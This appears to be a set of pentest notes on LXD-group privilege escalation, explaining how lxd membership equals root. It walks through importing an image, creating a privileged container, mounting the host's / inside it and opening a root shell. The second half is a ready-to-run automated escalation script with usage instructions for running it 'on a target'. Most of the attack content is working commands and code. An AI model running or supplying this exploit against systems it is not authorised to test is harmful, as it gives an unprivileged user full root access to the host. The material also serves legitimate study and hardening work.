
Linux Containers

  • Containers virtualize at the OS level, VMs at the hardware level.
  • Containers thus share the host kernel and isolate application processes from the rest of the system, while classic virtualization runs several complete operating systems, each with its own kernel, on a single host.
  • Both isolation and virtualization matter for the attacker: the container boundary is only as strong as its configuration, and a misconfigured container can hand out the host's root.

Linux Containers - LXC

  • LXC - OS-level virtualization allowing multiple isolated Linux systems to run on one host kernel.

LXD - Linux container daemon

  • Daemon and CLI built on top of LXC; the lxc command talks to the LXD daemon over its UNIX socket.
  • Designed to contain a complete OS: a system container, not an application container.

Escalation steps

  • id
    • the user needs to be in the lxd (or lxc) group; the numeric gids (108, 116 in this example) are host-specific, so match on the group name in the id output rather than the number
    • lxd group membership is effectively root: it grants access to the LXD socket, and the daemon runs as root
    • if LXD was never initialised on the target, lxc init fails with "No storage pool found" until lxd init has been run (defaults are fine)
  • now we can build a container image on our own machine and transfer it to the target, or use an image already present on the target
    • admins may have left insecure templates lying around
    • if we find a tar.xz (or other tarball) image, we can import it if no credentials are required; lxc image import expects a tarball, so a zip has to be unpacked first
  • lxc image import ubuntu-template.tar.xz --alias ubuntutemp
  • lxc image list
    • check that the image was imported
  • lxc init ubuntutemp privesc -c security.privileged=true
    • security.privileged=true disables uid/gid shifting: root inside the container is uid 0 on the host, so there is no isolation from host files
  • lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
    • adds a disk device named host-root to the container privesc that mounts the host's / at /mnt/root inside the container (recursive=true also carries the host's sub-mounts)
  • lxc start privesc
  • lxc exec privesc /bin/bash
  • Inside the container
    • ls -l /mnt/root
    • everything under /mnt/root is the host filesystem, accessed as root, because the privileged container's root is the host's root
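The whole sequence above as one script, added here as an example (it is not from the original notes). It parameterises the names the notes use (image file ubuntu-template.tar.xz, alias ubuntutemp, container privesc, mount point /mnt/root are assumptions, not fixed), checks group membership by name instead of the host-specific gid, and has a DRY_RUN mode that prints the lxc commands instead of running them so the sequence can be reviewed on a machine without LXD.

```shell
#!/bin/sh
# Added example: LXD group privilege escalation, automated.
# Assumptions (not from the original notes): image path, alias, container
# name and mount path are arguments; DRY_RUN=1 echoes commands instead of
# executing them; RUN_PRIVESC=1 must be set for main to run.
set -u

# Return 0 if the space-separated group list (as printed by `id -Gn`)
# contains lxd or lxc. Numeric gids such as 108/116 differ per host,
# so we match on the name.
in_lxd_group() {
    groups_list="$1"
    for g in $groups_list; do
        case "$g" in
            lxd|lxc) return 0 ;;
        esac
    done
    return 1
}

# Execute the command, or print it when DRY_RUN=1.
run() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# The escalation sequence from the notes, parameterised.
#   $1 image tarball   $2 image alias   $3 container name   $4 mount path
lxd_privesc() {
    image="$1"; alias_name="$2"; name="$3"; mnt="$4"
    run lxc image import "$image" --alias "$alias_name"
    run lxc image list
    # security.privileged=true: no uid/gid shifting, root inside == host root
    run lxc init "$alias_name" "$name" -c security.privileged=true
    # Mount the host's / at $mnt inside the container (sub-mounts included)
    run lxc config device add "$name" host-root disk source=/ path="$mnt" recursive=true
    run lxc start "$name"
    # Shell in the container; the host filesystem is under $mnt, writable as root
    run lxc exec "$name" /bin/bash
}

main() {
    if ! in_lxd_group "$(id -Gn)"; then
        echo "current user is not in the lxd/lxc group; this path is not available" >&2
        return 1
    fi
    lxd_privesc "${1:-ubuntu-template.tar.xz}" ubuntutemp privesc /mnt/root
}

# Only act when explicitly asked, so the file can be sourced safely.
if [ "${RUN_PRIVESC:-0}" = "1" ]; then
    main "$@"
fi
```

Usage on a target: `RUN_PRIVESC=1 sh lxd_privesc.sh ./ubuntu-template.tar.xz`; to just see what it would do, `DRY_RUN=1 RUN_PRIVESC=1 sh lxd_privesc.sh`. If `lxc init` reports "No storage pool found", run `lxd init` first. The lxc image import line assumes a unified tarball; a split image (separate metadata and rootfs tarballs) is imported by passing both files to `lxc image import`.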